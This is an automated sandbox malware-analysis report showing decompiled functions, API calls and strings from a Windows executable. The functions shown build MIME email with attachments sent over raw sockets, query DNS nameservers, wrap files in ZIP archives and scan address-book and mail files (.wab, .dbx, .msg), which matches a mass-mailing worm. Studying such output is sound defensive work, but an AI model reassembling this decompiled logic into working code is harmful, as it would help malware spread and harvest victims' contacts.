GetCommandLineA.KERNEL32 ref: 00403ED3
GetStartupInfoA.KERNEL32(?), ref: 00403EFE
GetModuleHandleA.KERNEL32(00000000,00000000,?,0000000A), ref: 00403F21

Part of subcall function 00403F7A: ExitProcess.KERNEL32 ref: 00403F97

Memory Dump Source

Source File: 00000000.00000002.564080407.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.564057032.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.564080407.0000000000409000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.564080407.00000000005C9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.564080407.00000000005CB000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ .jbxd

Similarity

API ID: Heap$CommandCreateDestroyExitHandleInfoLineModuleProcessStartupVersion
String ID:
API String ID: 2057626494-0
Opcode ID: 94e1c75d287a7a70b5de7a99e734f7e57b027cfdd7095c0a05cdbcabb1d7dc75
Instruction ID: 06eb08ac91fcce0bad54e09db9ce8b661c5edd268dd37a8a0e4b68f7ca2005f6
Opcode Fuzzy Hash: 94e1c75d287a7a70b5de7a99e734f7e57b027cfdd7095c0a05cdbcabb1d7dc75
Instruction Fuzzy Hash: 7B2171B1D446059EDB04AFA59D0AA6E7BA8EB84714F10053EF501BB3D1DB385940C7A9

Uniqueness

Uniqueness Score: -1.00%

Function 005E03F5 Relevance: 3.0, APIs: 2, Instructions: 42libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNELBASE ref: 005E0404
GetProcAddress.KERNEL32(?,00000000), ref: 005E042A

Memory Dump Source

Source File: 00000000.00000003.298323919.00000000005E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 005E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_3_5e0000_ .jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID:
API String ID: 2574300362-0
Opcode ID: f41758034674d93726ecefea48cfd71218187c667b4d8fae7afe95e189cf004c
Instruction ID: 1665bbdb59ad0d84209bf975869265e2f73afdf03e392db2a1d5d3d0e2e5e0ef
Opcode Fuzzy Hash: f41758034674d93726ecefea48cfd71218187c667b4d8fae7afe95e189cf004c
Instruction Fuzzy Hash: 38F0C8317002059BEF54CF2EDE8066AB7E0FF54394324593DD995D72C4E670ED508610

Uniqueness

Uniqueness Score: -1.00%

Function 0040257A Relevance: 56.2, APIs: 21, Strings: 11, Instructions: 185
networkstringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 32%

			E0040257A(void* __edx, void* __eflags, intOrPtr* _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, CHAR* _a20) {
				char _v260;
				char _v516;
				void* _t48;
				signed int _t84;
				void* _t110;
				intOrPtr* _t112;
				signed int _t119;
				intOrPtr* _t126;
				intOrPtr* _t127;

				E00402797(); // executed
				wsprintfA( &_v260, "From: %s");
				_t48 = E00403AA0( &_v260);
				_t126 = _a4;
				_t127 =  *0x407158;
				 *_t127( *_t126,  &_v260, _t48, 0, _a8); // executed
				wsprintfA( &_v260, "To: %s");
				 *_t127( *_t126,  &_v260, E00403AA0( &_v260), 0, _a12); // executed
				wsprintfA( &_v260, "Subject: %s");
				 *_t127( *_t126,  &_v260, E00403AA0( &_v260), 0, _a16); // executed
				wsprintfA( &_v260, "Date: %s");
				 *_t127( *_t126,  &_v260, E00403AA0( &_v260), 0,  &_v516);
				 *0x407034( &_v260, "MIME-Version: 1.0");
				 *_t127( *_t126,  &_v260, E00403AA0( &_v260), 0); // executed
				 *0x407034( &_v260, "Content-Type: multipart/mixed;");
				 *_t127( *_t126,  &_v260, E00403AA0( &_v260), 0);
				_t84 = E00401BE1();
				asm("cdq");
				_t119 = 0xf;
				wsprintfA(_a20, "----=_NextPart_%.3u_%.4u_%.8X.%.8X");
				wsprintfA( &_v260, "	boundary="%s"");
				 *_t127( *_t126,  &_v260, E00403AA0( &_v260), 0, _a20, 0, _t84 % _t119, E00401BE1(), E00401BE1());
				_t112 =  *0x407034;
				 *_t112( &_v260, "X-Priority: 1");
				 *_t127( *_t126,  &_v260, E00403AA0( &_v260), 0);
				 *_t112( &_v260, "X-MSMail-Priority: High");
				 *_t127( *_t126,  &_v260, E00403AA0( &_v260), 0);
				 *_t112( &_v260, 0x409714);
				_t110 =  *_t127( *_t126,  &_v260, E00403AA0( &_v260), 0);
				_push(1);
				return _t110;
			}

0x0040258d
0x004025a7
0x004025b5
0x004025ba
0x004025be
0x004025ce
0x004025df
0x004025fd
0x0040260e
0x0040262c
0x00402641
0x0040265f
0x0040266d
0x0040268c
0x0040269a
0x004026b9
0x004026c7
0x004026ce
0x004026cf
0x004026dd
0x004026ee
0x0040270c
0x0040270e
0x00402720
0x0040273b
0x00402749
0x00402764
0x00402772
0x0040278d
0x0040278f
0x00402796

APIs

Part of subcall function 00402797: GetLocalTime.KERNEL32(?), ref: 00402829
Part of subcall function 00402797: GetTimeZoneInformation.KERNELBASE(00000000), ref: 0040283D
Part of subcall function 00402797: wsprintfA.USER32 ref: 004028D5

wsprintfA.USER32 ref: 004025A7
send.WS2_32(?,?,00000000,00000000), ref: 004025CE
wsprintfA.USER32 ref: 004025DF
send.WS2_32(?,?,00000000,00000000), ref: 004025FD
wsprintfA.USER32 ref: 0040260E
send.WS2_32(?,?,00000000,00000000), ref: 0040262C
wsprintfA.USER32 ref: 00402641
send.WS2_32(?,?,00000000,00000000), ref: 0040265F
lstrcpy.KERNEL32(?,MIME-Version: 1.0), ref: 0040266D
send.WS2_32(?,?,00000000,00000000), ref: 0040268C
lstrcpy.KERNEL32(?,Content-Type: multipart/mixed;), ref: 0040269A
send.WS2_32(?,?,00000000,00000000), ref: 004026B9
wsprintfA.USER32 ref: 004026DD
wsprintfA.USER32 ref: 004026EE
send.WS2_32(?,?,00000000,00000000), ref: 0040270C
lstrcpy.KERNEL32(?,X-Priority: 1), ref: 00402720
send.WS2_32(?,?,00000000,00000000), ref: 0040273B
lstrcpy.KERNEL32(?,X-MSMail-Priority: High), ref: 00402749
send.WS2_32(?,?,00000000,00000000), ref: 00402764
lstrcpy.KERNEL32(?,), ref: 00402772
send.WS2_32(?,?,00000000,00000000), ref: 0040278D

Strings

X-MSMail-Priority: High, xrefs: 00402743
, xrefs: 00402766
----=_NextPart_%.3u_%.4u_%.8X.%.8X, xrefs: 004026D5
boundary="%s", xrefs: 004026E8
Date: %s, xrefs: 0040263B
To: %s, xrefs: 004025D9
X-Priority: 1, xrefs: 0040271A
From: %s, xrefs: 004025A1
Subject: %s, xrefs: 00402608
Content-Type: multipart/mixed;, xrefs: 00402694
MIME-Version: 1.0, xrefs: 00402667

Memory Dump Source

Source File: 00000000.00000002.564080407.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.564057032.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.564080407.0000000000409000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.564080407.00000000005C9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.564080407.00000000005CB000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ .jbxd

Similarity

API ID: send$wsprintf$lstrcpy$Time$InformationLocalZone
String ID: boundary="%s"$$Content-Type: multipart/mixed;$Date: %s$MIME-Version: 1.0$Subject: %s$To: %s$X-MSMail-Priority: High$X-Priority: 1$----=_NextPart_%.3u_%.4u_%.8X.%.8X$From: %s
API String ID: 1362953690-3063341427
Opcode ID: 060a528a399eff6e3809f06bdc55837a0544d5015dd423ea592b255043b3a47a
Instruction ID: 48b4291624e9e8aa6c3ad2942d95b0ce31acfd0fb76c18adc75eb4903bfe6a73
Opcode Fuzzy Hash: 060a528a399eff6e3809f06bdc55837a0544d5015dd423ea592b255043b3a47a
Instruction Fuzzy Hash: 8551267794011CBADF12DBA0DC86FEA777CEB18300F1404A7B545F6091DAB9AB948F68

Uniqueness

Uniqueness Score: -1.00%

Function 004017AD Relevance: 35.2, APIs: 19, Strings: 1, Instructions: 201
filestringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 70%

			E004017AD(void* __ecx, long _a4, void* _a8, void* _a12) {
				void* _v8;
				intOrPtr _v12;
				short _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				short _v26;
				short _v28;
				short _v30;
				short _v32;
				void _v36;
				short _v40;
				short _v42;
				long _v46;
				long _v50;
				intOrPtr _v54;
				void* _v56;
				void* _v58;
				short _v60;
				short _v62;
				short _v64;
				void _v68;
				struct _OVERLAPPED* _v74;
				intOrPtr _v78;
				short _v80;
				short _v86;
				short _v88;
				long _v92;
				long _v96;
				intOrPtr _v100;
				short _v102;
				short _v104;
				short _v106;
				short _v108;
				short _v110;
				short _v112;
				void _v116;
				long _v120;
				void _v1144;
				void* _t87;
				void* _t88;
				void* _t89;
				intOrPtr _t103;
				long _t104;
				long _t105;
				short _t106;
				int _t118;
				void* _t126;
				intOrPtr* _t139;
				void* _t143;

				_t87 = CreateFileA(_a4, 0x80000000, 3, 0, 3, 0x80, 0); // executed
				_v8 = _t87;
				if(_t87 == 0xffffffff || _t87 == 0) {
					_t88 = 1;
					return _t88;
				} else {
					_t89 = CreateFileA(_a8, 0x40000000, 3, 0, 2, 0x80, 0); // executed
					_t143 = _t89;
					_a8 = _t143;
					if(_t143 == 0xffffffff || _t143 == 0) {
						_push(2);
						_pop(0);
						goto L9;
					} else {
						E00403600( &_v68, 0, 0x1e);
						E00403600( &_v116, 0, 0x2e);
						E00403600( &_v36, 0, 0x16);
						_v68 = 0x4034b50;
						_v64 = 0xa;
						_v110 = 0xa;
						_v62 = 0;
						_v108 = 0;
						_v60 = 0;
						_v106 = 0;
						E004019E8( &_v58,  &_v56);
						_v104 = _v58;
						_v102 = _v56;
						_t103 = E00401A6D(_v8); // executed
						_v54 = _t103;
						_v100 = _t103;
						_t104 = GetFileSize(_v8, 0);
						_v50 = _t104;
						_v96 = _t104;
						_t105 = GetFileSize(_v8, 0);
						_t139 =  *0x407024;
						_v46 = _t105;
						_v92 = _t105;
						_t106 =  *_t139(_a12);
						_v42 = _t106;
						_v88 = _t106;
						_v40 = 0;
						_v86 = 0;
						_v74 = 0;
						WriteFile(_t143,  &_v68, 0x1e,  &_a4, 0); // executed
						WriteFile(_a8, _a12,  *_t139(0), _a12,  &_a4); // executed
						_v12 =  *_t139(_a12) + 0x1e;
						SetFilePointer(_v8, 0, 0, 0); // executed
						while(1) {
							_a4 = 0;
							_t118 = ReadFile(_v8,  &_v1144, 0x400,  &_a4, 0); // executed
							if(_t118 == 0 || _a4 == 0) {
								break;
							}
							WriteFile(_a8,  &_v1144, _a4,  &_v120, 0); // executed
							_v12 = _v12 + _a4;
						}
						_v20 = _v12;
						_v116 = 0x2014b50;
						_v112 = 0x14;
						_v80 = 0;
						_v78 = 0x20;
						WriteFile(_a8,  &_v116, 0x2e,  &_a4, 0); // executed
						WriteFile(_a8, _a12,  *_t139(0), _a12,  &_a4); // executed
						_t126 =  *_t139(_a12);
						_v36 = 0x6054b50;
						_v32 = 0;
						_v30 = 0;
						_v28 = 1;
						_v26 = 1;
						_v16 = 0;
						_v24 = _v12 + _t126 + 0x2e - _v20;
						WriteFile(_a8,  &_v36, 0x16,  &_a4, 0); // executed
						FindCloseChangeNotification(_a8); // executed
						L9:
						CloseHandle(_v8);
						return 0;
					}
				}
			}

0x004017d5
0x004017da
0x004017dd
0x004019e2
0x00000000
0x004017eb
0x004017fa
0x004017fc
0x00401801
0x00401804
0x004019db
0x004019dd
0x00000000
0x00401812
0x00401819
0x00401825
0x00401831
0x00401839
0x00401845
0x0040184b
0x00401851
0x00401855
0x00401859
0x0040185d
0x00401861
0x0040186d
0x00401875
0x00401879
0x00401887
0x0040188a
0x00401891
0x00401894
0x0040189a
0x0040189d
0x004018a2
0x004018a8
0x004018ab
0x004018ae
0x004018b0
0x004018b4
0x004018ca
0x004018ce
0x004018d2
0x004018d5
0x004018e8
0x004018f8
0x004018fb
0x00401901
0x00401915
0x00401918
0x00401920
0x00000000
0x00000000
0x00401939
0x0040193e
0x0040193e
0x00401947
0x00401957
0x0040195e
0x00401964
0x00401968
0x0040196f
0x00401982
0x00401987
0x0040198d
0x00401994
0x0040199c
0x004019a3
0x004019a9
0x004019af
0x004019b3
0x004019c3
0x004019c8
0x004019ce
0x004019d1
0x00000000
0x004019d7
0x00401804

APIs

CreateFileA.KERNELBASE(?,80000000,00000003,00000000,00000003,00000080,00000000,00000000,000005DC,76685440), ref: 004017D5
CreateFileA.KERNELBASE(?,40000000,00000003,00000000,00000002,00000080,00000000), ref: 004017FA
CloseHandle.KERNEL32(?), ref: 004019D1

Part of subcall function 004019E8: GetSystemTime.KERNEL32(0000002E,0000002E,?,00000000,0000001E), ref: 004019F2

Part of subcall function 00401A6D: SetFilePointer.KERNELBASE(00000000,00000000,00000000,00000000,00000000,00000000,766DF7B0), ref: 00401A81
Part of subcall function 00401A6D: ReadFile.KERNELBASE(00000000,?,00000400,0000001E,00000000), ref: 00401AA8
Part of subcall function 00401A6D: SetFilePointer.KERNELBASE(00000000,00000000,00000000,00000000), ref: 00401AE6

GetFileSize.KERNEL32(?,00000000), ref: 00401891
GetFileSize.KERNEL32(?,00000000), ref: 0040189D
lstrlen.KERNEL32(?), ref: 004018AE
WriteFile.KERNELBASE(00000000,04034B50,0000001E,?,00000000), ref: 004018D5
lstrlen.KERNEL32(?,?,00000000), ref: 004018DF
WriteFile.KERNELBASE(?,?,00000000), ref: 004018E8
lstrlen.KERNEL32(?), ref: 004018ED
SetFilePointer.KERNELBASE(?,00000000,00000000,00000000), ref: 004018FB
ReadFile.KERNELBASE(?,?,00000400,?,00000000), ref: 00401918
WriteFile.KERNELBASE(?,?,?,?,00000000), ref: 00401939
WriteFile.KERNELBASE(?,?,0000002E,?,00000000), ref: 0040196F
lstrlen.KERNEL32(?,?,00000000), ref: 00401979
WriteFile.KERNELBASE(?,?,00000000), ref: 00401982
lstrlen.KERNEL32(?), ref: 00401987
WriteFile.KERNELBASE(?,06054B50,00000016,?,00000000), ref: 004019C3
FindCloseChangeNotification.KERNELBASE(?), ref: 004019C8

Strings

, xrefs: 00401968

Memory Dump Source

Source File: 00000000.00000002.564080407.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.564057032.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.564080407.0000000000409000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.564080407.00000000005C9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.564080407.00000000005CB000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ .jbxd

Similarity

API ID: File$Write$lstrlen$Pointer$CloseCreateReadSize$ChangeFindHandleNotificationSystemTime
String ID:
API String ID: 1180781683-3916222277
Opcode ID: cf6aff0258c83f7b1c90afa66d936a01cf2cbea76fd21880074e1c0b12b55f12
Instruction ID: a0de5941879ee98c977f74ae06c76d7d152e6e9aa33084af7ecbd8f685a4ee3f
Opcode Fuzzy Hash: cf6aff0258c83f7b1c90afa66d936a01cf2cbea76fd21880074e1c0b12b55f12
Instruction Fuzzy Hash: EA71157590121CBADF21DFA1DC84EDFBBB9FF08354F104126F914AA2A0D7359A40DBA9

Uniqueness

Uniqueness Score: -1.00%

Function 004028E2 Relevance: 35.1, APIs: 15, Strings: 5, Instructions: 148
networkstringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 34%

			E004028E2(void* __eflags, signed int _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, signed int _a20) {
				signed char _v515;
				char _v516;
				void* _t43;
				intOrPtr _t68;
				void* _t73;
				void* _t81;
				intOrPtr* _t99;
				intOrPtr* _t100;

				 *0x407034( &_v516, "This is a multi-part message in MIME format.");
				_t43 = E00403AA0( &_v516);
				_t99 = _a4;
				_t100 =  *0x407158;
				 *_t100( *_t99,  &_v516, _t43, 0); // executed
				wsprintfA( &_v516, "--%sContent-Type: text/plain;	charset="Windows-1252"Content-Transfer-Encoding: 7bit");
				 *_t100( *_t99,  &_v516, E00403AA0( &_v516), 0, _a8);
				_a4 = _a4 & 0x00000000;
				if(E00403AA0(_a12) <= 0) {
					L2:
					 *0x407034( &_v516, 0x409908);
					 *_t100( *_t99,  &_v516, E00403AA0( &_v516), 0);
					wsprintfA( &_v516, "--%sContent-Type: application/octet-stream;	name="%s"Content-Transfer-Encoding: base64Content-Disposition: attachment;	filename="%s"");
					 *_t100( *_t99,  &_v516, E00403AA0( &_v516), 0, _a8, _a16, _a16);
					_t68 =  *0x407044(0x5c6970 + _a20 * 0x5dc, 0); // executed
					_a12 = _t68;
					if(_t68 == 0xffffffff) {
						return 0;
					}
					E004039B0( &_v516, 0x5c99a4);
					while(1) {
						_t73 =  *0x407040(_a12,  &_v516, 1);
						if(_t73 != 1) {
							break;
						}
						_v515 = _v515 & 0x00000000;
						 *_t100( *_t99,  &_v516, _t73, 0); // executed
					}
					 *0x407038(_a12);
					wsprintfA( &_v516, "--%s--");
					 *_t100( *_t99,  &_v516, E00403AA0( &_v516), 0, _a8);
					_t81 = 1;
					return _t81;
				} else {
					goto L1;
				}
				do {
					L1:
					 *_t100( *_t99, _a4 + _a12, 1, 0);
					_a4 = _a4 + 1;
				} while (_a4 < E00403AA0(_a12));
				goto L2;
			}

0x004028fa
0x00402909
0x0040290e
0x00402912
0x00402922
0x00402939
0x00402957
0x0040295c
0x00402968
0x0040298c
0x00402998
0x004029b7
0x004029ce
0x004029ec
0x004029ff
0x00402a08
0x00402a0b
0x00000000
0x00402a8b
0x00402a19
0x00402a20
0x00402a2c
0x00402a35
0x00000000
0x00000000
0x00402a37
0x00402a4a
0x00402a4a
0x00402a51
0x00402a66
0x00402a84
0x00402a88
0x00000000
0x00000000
0x00000000
0x00000000
0x0040296a
0x0040296a
0x00402979
0x0040297e
0x00402989
0x00000000

APIs

lstrcpy.KERNEL32(?,This is a multi-part message in MIME format.), ref: 004028FA
send.WS2_32(?,?,00000000,00000000), ref: 00402922
wsprintfA.USER32 ref: 00402939
send.WS2_32(?,?,00000000,00000000), ref: 00402957
send.WS2_32(?,00000000,00000001,00000000), ref: 00402979
lstrcpy.KERNEL32(?,), ref: 00402998
send.WS2_32(?,?,00000000,00000000), ref: 004029B7
wsprintfA.USER32 ref: 004029CE
send.WS2_32(?,?,00000000,00000000), ref: 004029EC
_lopen.KERNEL32(-001C4459,00000000), ref: 004029FF
_hread.KERNEL32(?,?,00000001), ref: 00402A2C
send.WS2_32(?,?,00000000,00000000), ref: 00402A4A
_lclose.KERNEL32(?), ref: 00402A51
wsprintfA.USER32 ref: 00402A66
send.WS2_32(?,?,00000000,00000000), ref: 00402A84

Strings

--%sContent-Type: application/octet-stream;name="%s"Content-Transfer-Encoding: base64Content-Disposition: attachment;filename="%s", xrefs: 004029C8
--%sContent-Type: text/plain;charset="Windows-1252"Content-Transfer-Encoding: 7bit, xrefs: 00402933
This is a multi-part message in MIME format., xrefs: 004028F4
--%s--, xrefs: 00402A60
, xrefs: 00402992

Memory Dump Source

Source File: 00000000.00000002.564080407.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.564057032.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.564080407.0000000000409000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.564080407.00000000005C9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.564080407.00000000005CB000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ .jbxd

Similarity

API ID: send$wsprintf$lstrcpy$_hread_lclose_lopen
String ID: $--%s--$--%sContent-Type: application/octet-stream;name="%s"Content-Transfer-Encoding: base64Content-Disposition: attachment;filename="%s"$--%sContent-Type: text/plain;charset="Windows-1252"Content-Transfer-Encoding: 7bit$This is a multi-part message in MIME format.
API String ID: 1696248574-392689982
Opcode ID: fe508edb96677c71275d9e2af2a6bf15a433636c5ee14d0a00f475042cf415d8
Instruction ID: 4c1e462473c6eea283a4cb0d85fb9efa5d3c2b8bdf588367cf0d8906934619ec
Opcode Fuzzy Hash: fe508edb96677c71275d9e2af2a6bf15a433636c5ee14d0a00f475042cf415d8
Instruction Fuzzy Hash: 37514E76A00219ABEF119F60DC89FEA7B7CFB04310F1400BAB915E61D1DB79AA548F58

Uniqueness

Uniqueness Score: -1.00%

Function 004010A4 Relevance: 29.9, APIs: 15, Strings: 2, Instructions: 150
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

getservbyname.WS2_32(nameserver,UDP), ref: 004010FF
htons.WS2_32(00000035), ref: 00401111
inet_addr.WS2_32(00000000), ref: 0040111A
gethostbyname.WS2_32(00000000), ref: 0040112B
socket.WS2_32(00000002,00000002,00000000), ref: 00401144
htons.WS2_32(000011DF), ref: 00401164
htons.WS2_32(00000001), ref: 00401176
htons.WS2_32(00000002), ref: 004011B6
htons.WS2_32(00000001), ref: 004011C2
setsockopt.WS2_32(0000000F,0000FFFF,00001006,004023B7,00000004), ref: 004011ED
setsockopt.WS2_32(0000000F,0000FFFF,00001005,00000FA0,00000004), ref: 004011FF
sendto.WS2_32(0000000F,00000000,-00000010,00000000,00000002,00000010), ref: 00401215
recvfrom.WS2_32(0000000F,00409030,00000800,00000000,00000002,00409030), ref: 00401238
WSAGetLastError.WS2_32(?,76685480,004023B7), ref: 00401243
closesocket.WS2_32(0000000F), ref: 0040125B

Strings

nameserver, xrefs: 004010FA
UDP, xrefs: 004010F5

Memory Dump Source

Source File: 00000000.00000002.564080407.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.564057032.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.564080407.0000000000409000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.564080407.00000000005C9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.564080407.00000000005CB000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ .jbxd

Similarity

API ID: htons$setsockopt$ErrorLastclosesocketgethostbynamegetservbynameinet_addrrecvfromsendtosocket
String ID: UDP$nameserver
API String ID: 2147619886-4175462922
Opcode ID: 6a5c57feaf6915e7b3576cca1f53a58af78e9df73f7e880851d989401cefa696
Instruction ID: 8019c20b8a9b1830b1589fb06da3b6cf45146f2ac329d422f73d8d9ef69d4db5
Opcode Fuzzy Hash: 6a5c57feaf6915e7b3576cca1f53a58af78e9df73f7e880851d989401cefa696
Instruction Fuzzy Hash: A751E431904259AADB10AF64DC45BDE77B8FF04320F204676FA15FA2E0DBB45E418BDA

Uniqueness

Uniqueness Score: -1.00%

Function 00401ED9 Relevance: 26.4, APIs: 7, Strings: 8, Instructions: 176
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 64%

			E00401ED9(void* __ecx, void* __eflags, CHAR* _a4) {
				CHAR* _v8;
				signed int _v12;
				char _v268;
				char _v4368;
				CHAR* _t47;
				void* _t56;
				void* _t57;
				void* _t62;
				void* _t73;
				void* _t74;
				void* _t75;
				void* _t83;
				void* _t95;
				CHAR* _t111;
				signed int _t113;
				intOrPtr* _t114;
				void* _t115;
				void* _t116;
				void* _t117;

				_t117 = __eflags;
				E00403BF0(0x110c, __ecx);
				_t47 = E00401C26(_t117, _a4);
				_t111 = _t47;
				_t113 = 0;
				_v8 = _t111;
				if(_t111 != 0) {
					CharLowerBuffA(_t111, E00403AA0(_t111));
					_v12 = 0;
					do {
						_push(0);
						_push( *((intOrPtr*)(0x4090f4 + _t113 * 4)));
						E00401BAD( &_v268);
						_t47 = E00403C20( &_v268, _t111);
						_t116 = _t116 + 0x14;
						if(_t47 != 0) {
							_t113 = 0xff;
						}
						_t113 = _t113 + 1;
					} while (_t113 < 0x22);
					if(_t113 >= 0xff) {
						_t47 =  *0x407044(_a4, 0); // executed
						_a4 = _t47;
						if(_t47 != 0xffffffff) {
							E004039B0( &_v4368, 0x5c99a4);
							_t114 =  *0x407040;
							_t56 =  *_t114(_a4,  &_v4368, 0x1000);
							 *(_t115 + _t56 - 0x110c) =  *(_t115 + _t56 - 0x110c) & 0x00000000;
							while(_t56 > 0) {
								CharLowerBuffA( &_v4368, E00403AA0( &_v4368)); // executed
								_t62 = E00403DD0(_v8, ".sht");
								_pop(_t95);
								if(_t62 == 0) {
									L20:
									E00401C57( &_v4368);
									E00401C7D(_t95, __eflags,  &_v4368);
									E00401D4F(__eflags,  &_v4368);
									_t116 = _t116 + 0xc;
									L21:
									 *0x40703c(_a4, _v12, 0); // executed
									E004039B0( &_v4368, 0x5c99a4);
									_t56 =  *_t114(_a4,  &_v4368, 0x1000);
									 *(_t115 + _t56 - 0x110c) =  *(_t115 + _t56 - 0x110c) & 0x00000000;
									_v12 = _v12 + 0x800;
									continue;
								}
								_t73 = E00403DD0(_v8, ".tbb");
								_pop(_t95);
								if(_t73 == 0) {
									goto L20;
								}
								_t74 = E00403DD0(_v8, ".adb");
								_pop(_t95);
								if(_t74 == 0) {
									goto L20;
								}
								_t75 = E00403DD0(_v8, ".wab");
								_pop(_t95);
								if(_t75 == 0) {
									goto L20;
								}
								if(E00403DD0(_v8, ?str?) == 0 || E00403DD0(_v8, ?str?) == 0 || E00403DD0(_v8, ?str?) == 0) {
									L19:
									E00401C57( &_v4368);
									E00401D4F(__eflags,  &_v4368);
									goto L18;
								} else {
									_t83 = E00403DD0(_v8, ".msg");
									_t132 = _t83;
									if(_t83 == 0) {
										goto L19;
									}
									E00401D4F(_t132,  &_v4368);
									L18:
									goto L21;
								}
							}
							_t57 =  *0x407038(_a4); // executed
							return _t57;
						}
					}
				}
				return _t47;
			}

0x00401ed9
0x00401ee1
0x00401eec
0x00401ef1
0x00401ef3
0x00401ef8
0x00401efb
0x00401f0a
0x00401f10
0x00401f18
0x00401f18
0x00401f20
0x00401f28
0x00401f35
0x00401f3a
0x00401f3f
0x00401f41
0x00401f41
0x00401f43
0x00401f44
0x00401f4b
0x00401f56
0x00401f5f
0x00401f62
0x00401f75
0x00401f7b
0x00401f92
0x00401f94
0x00401f9c
0x00401fb9
0x00401fc7
0x00401fcf
0x00401fd0
0x0040208d
0x00402094
0x004020a0
0x004020ac
0x004020b1
0x004020b4
0x004020bc
0x004020ca
0x004020dc
0x004020de
0x004020e6
0x00000000
0x004020e6
0x00401fde
0x00401fe6
0x00401fe7
0x00000000
0x00000000
0x00401ff5
0x00401ffd
0x00401ffe
0x00000000
0x00000000
0x0040200c
0x00402014
0x00402015
0x00000000
0x00000000
0x00402028
0x00402072
0x00402079
0x00402085
0x00000000
0x00402050
0x00402058
0x0040205e
0x00402061
0x00000000
0x00000000
0x0040206a
0x0040206f
0x00000000
0x0040206f
0x00402028
0x004020f5
0x00000000
0x004020f5
0x00401f62
0x00401f4b
0x004020ff

APIs

CharLowerBuffA.USER32(00000000,00000000,?,00000000,?,?,004021F1,?), ref: 00401F0A

Part of subcall function 00401BAD: lstrcpy.KERNEL32(?,005C99A4), ref: 00401BB9

_lopen.KERNEL32(004021F1,00000000), ref: 00401F56
_hread.KERNEL32(004021F1,?,00001000), ref: 00401F92
CharLowerBuffA.USER32(00000000,00000000), ref: 00401FB9
_llseek.KERNEL32(004021F1,004021F1,00000000), ref: 004020BC
_hread.KERNEL32(004021F1,?,00001000), ref: 004020DC
_lclose.KERNEL32(004021F1), ref: 004020F5

Strings

.doc, xrefs: 0040203D
.msg, xrefs: 00402050
.oft, xrefs: 00402017
.dbx, xrefs: 0040202A
.tbb, xrefs: 00401FD6
.adb, xrefs: 00401FED
.sht, xrefs: 00401FBF
.wab, xrefs: 00402004

Memory Dump Source

Source File: 00000000.00000002.564080407.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.564057032.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.564080407.0000000000409000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.564080407.00000000005C9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.564080407.00000000005CB000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ .jbxd

Similarity

API ID: BuffCharLower_hread$_lclose_llseek_lopenlstrcpy
String ID: .adb$.dbx$.doc$.msg$.oft$.sht$.tbb$.wab
API String ID: 1058672048-2523771663
Opcode ID: e9ed32a7e18f2bc4e458a426adc2237e649b4896645cd6e826ce50d7f3b51838
Instruction ID: a91334f8b447eb0cf4f4c75a32d919c3e65830840ceb68d5e870a6a449bb6114
Opcode Fuzzy Hash: e9ed32a7e18f2bc4e458a426adc2237e649b4896645cd6e826ce50d7f3b51838
Instruction Fuzzy Hash: 8651E376D04209AADF15AFA1DC09EDE7B6C9F15315F2041BBF600B14E2DBB89E809E5C

Uniqueness

Uniqueness Score: -1.00%

